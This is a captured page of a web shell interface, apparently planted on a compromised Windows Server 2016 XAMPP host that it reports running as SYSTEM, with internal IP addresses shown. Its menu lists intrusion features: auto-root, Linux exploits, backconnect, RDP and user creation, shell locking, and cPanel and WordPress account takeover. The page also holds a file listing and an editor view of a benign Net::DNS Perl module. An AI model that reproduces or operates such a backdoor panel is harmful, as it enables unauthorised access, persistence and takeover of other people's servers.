Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
xampp7 /
perl /
vendor /
lib /
Net /
DNS /
RR /
[ HOME SHELL ]
Name
Size
Permission
Action
A.pm
2.91
KB
-rw-rw-rw-
AAAA.pm
3.91
KB
-rw-rw-rw-
AFSDB.pm
3.33
KB
-rw-rw-rw-
AMTRELAY.pm
6.31
KB
-rw-rw-rw-
APL.pm
6.06
KB
-rw-rw-rw-
CAA.pm
4.01
KB
-rw-rw-rw-
CDNSKEY.pm
2.46
KB
-rw-rw-rw-
CDS.pm
2.51
KB
-rw-rw-rw-
CERT.pm
6.18
KB
-rw-rw-rw-
CNAME.pm
2.88
KB
-rw-rw-rw-
CSYNC.pm
4.32
KB
-rw-rw-rw-
DHCID.pm
4.74
KB
-rw-rw-rw-
DNAME.pm
2.79
KB
-rw-rw-rw-
DNSKEY.pm
8.82
KB
-rw-rw-rw-
DS.pm
10.01
KB
-rw-rw-rw-
EUI48.pm
3.14
KB
-rw-rw-rw-
EUI64.pm
3.15
KB
-rw-rw-rw-
GPOS.pm
4.15
KB
-rw-rw-rw-
HINFO.pm
2.98
KB
-rw-rw-rw-
HIP.pm
5.13
KB
-rw-rw-rw-
IPSECKEY.pm
6.85
KB
-rw-rw-rw-
ISDN.pm
3.33
KB
-rw-rw-rw-
KEY.pm
2.28
KB
-rw-rw-rw-
KX.pm
3.57
KB
-rw-rw-rw-
L32.pm
3.71
KB
-rw-rw-rw-
L64.pm
3.74
KB
-rw-rw-rw-
LOC.pm
7.81
KB
-rw-rw-rw-
LP.pm
3.96
KB
-rw-rw-rw-
MB.pm
2.73
KB
-rw-rw-rw-
MG.pm
2.76
KB
-rw-rw-rw-
MINFO.pm
3.82
KB
-rw-rw-rw-
MR.pm
2.75
KB
-rw-rw-rw-
MX.pm
3.73
KB
-rw-rw-rw-
NAPTR.pm
5.66
KB
-rw-rw-rw-
NID.pm
3.84
KB
-rw-rw-rw-
NS.pm
2.84
KB
-rw-rw-rw-
NSEC.pm
7.72
KB
-rw-rw-rw-
NSEC3.pm
12.09
KB
-rw-rw-rw-
NSEC3PARAM.pm
4.73
KB
-rw-rw-rw-
NULL.pm
2.07
KB
-rw-rw-rw-
OPENPGPKEY.pm
3
KB
-rw-rw-rw-
OPT.pm
13.34
KB
-rw-rw-rw-
PTR.pm
2.73
KB
-rw-rw-rw-
PX.pm
4.19
KB
-rw-rw-rw-
RP.pm
3.81
KB
-rw-rw-rw-
RRSIG.pm
23.62
KB
-rw-rw-rw-
RT.pm
3.69
KB
-rw-rw-rw-
SIG.pm
21.81
KB
-rw-rw-rw-
SMIMEA.pm
5.12
KB
-rw-rw-rw-
SOA.pm
7.65
KB
-rw-rw-rw-
SPF.pm
2.66
KB
-rw-rw-rw-
SRV.pm
4.32
KB
-rw-rw-rw-
SSHFP.pm
4.61
KB
-rw-rw-rw-
TKEY.pm
5.42
KB
-rw-rw-rw-
TLSA.pm
5.18
KB
-rw-rw-rw-
TSIG.pm
19.78
KB
-rw-rw-rw-
TXT.pm
3.72
KB
-rw-rw-rw-
URI.pm
4.15
KB
-rw-rw-rw-
X25.pm
2.78
KB
-rw-rw-rw-
ZONEMD.pm
4.33
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : AAAA.pm
package Net::DNS::RR::AAAA; # # $Id: AAAA.pm 1597 2017-09-22 08:04:02Z willem $ # our $VERSION = (qw$LastChangedRevision: 1597 $)[1]; use strict; use warnings; use base qw(Net::DNS::RR); =head1 NAME Net::DNS::RR::AAAA - DNS AAAA resource record =cut use integer; sub _decode_rdata { ## decode rdata from wire-format octet string my $self = shift; my ( $data, $offset ) = @_; $self->{address} = unpack "\@$offset a16", $$data; } sub _encode_rdata { ## encode rdata as wire-format octet string my $self = shift; pack 'a16', $self->{address}; } sub _format_rdata { ## format rdata portion of RR string. my $self = shift; $self->address_short; } sub _parse_rdata { ## populate RR from rdata in argument list my $self = shift; $self->address(shift); } sub address_long { my $addr = pack 'a*@16', grep defined, shift->{address}; sprintf '%x:%x:%x:%x:%x:%x:%x:%x', unpack 'n8', $addr; } sub address_short { my $addr = pack 'a*@16', grep defined, shift->{address}; for ( sprintf ':%x:%x:%x:%x:%x:%x:%x:%x:', unpack 'n8', $addr ) { s/(:0[:0]+:)(?!.+:0\1)/::/; # squash longest zero sequence s/^:// unless /^::/; # prune LH : s/:$// unless /::$/; # prune RH : return $_; } } sub address { my $self = shift; return address_long($self) unless scalar @_; my $addr = shift; my @parse = split /:/, "0$addr"; if ( (@parse)[$#parse] =~ /\./ ) { # embedded IPv4 my @ip4 = split /\./, pop(@parse); my $rhs = pop(@ip4); my @ip6 = map { /./ ? hex($_) : (0) x ( 7 - @parse ) } @parse; return $self->{address} = pack 'n6 C4', @ip6, @ip4, (0) x ( 3 - @ip4 ), $rhs; } # Note: pack() masks overlarge values, mostly without warning. my @expand = map { /./ ? hex($_) : (0) x ( 9 - @parse ) } @parse; $self->{address} = pack 'n8', @expand; } 1; __END__ =head1 SYNOPSIS use Net::DNS; $rr = new Net::DNS::RR('name IN AAAA address'); $rr = new Net::DNS::RR( name => 'example.com', type => 'AAAA', address => '2001:DB8::8:800:200C:417A' ); =head1 DESCRIPTION Class for DNS IPv6 Address (AAAA) resource records. =head1 METHODS The available methods are those inherited from the base class augmented by the type-specific methods defined in this package. Use of undocumented package features or direct access to internal data structures is discouraged and could result in program termination or other unpredictable behaviour. =head2 address $IPv6_address = $rr->address; Returns the text representation of the IPv6 address. =head2 address_long $IPv6_address = $rr->address_long; Returns the text representation specified in RFC3513, 2.2(1). =head2 address_short $IPv6_address = $rr->address_short; Returns the textual form of address recommended by RFC5952. =head1 COPYRIGHT Copyright (c)1997 Michael Fuhr. Portions Copyright (c)2003 Chris Reinhardt. Portions Copyright (c)2012 Dick Franks. All rights reserved. Package template (c)2009,2012 O.M.Kolkman and R.W.Franks. =head1 LICENSE Permission to use, copy, modify, and distribute this software and its documentation for any purpose and without fee is hereby granted, provided that the above copyright notice appear in all copies and that both that copyright notice and this permission notice appear in supporting documentation, and that the name of the author not be used in advertising or publicity pertaining to distribution of the software without specific prior written permission. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. =head1 SEE ALSO L<perl>, L<Net::DNS>, L<Net::DNS::RR>, RFC3596, RFC3513, RFC5952 =cut
Close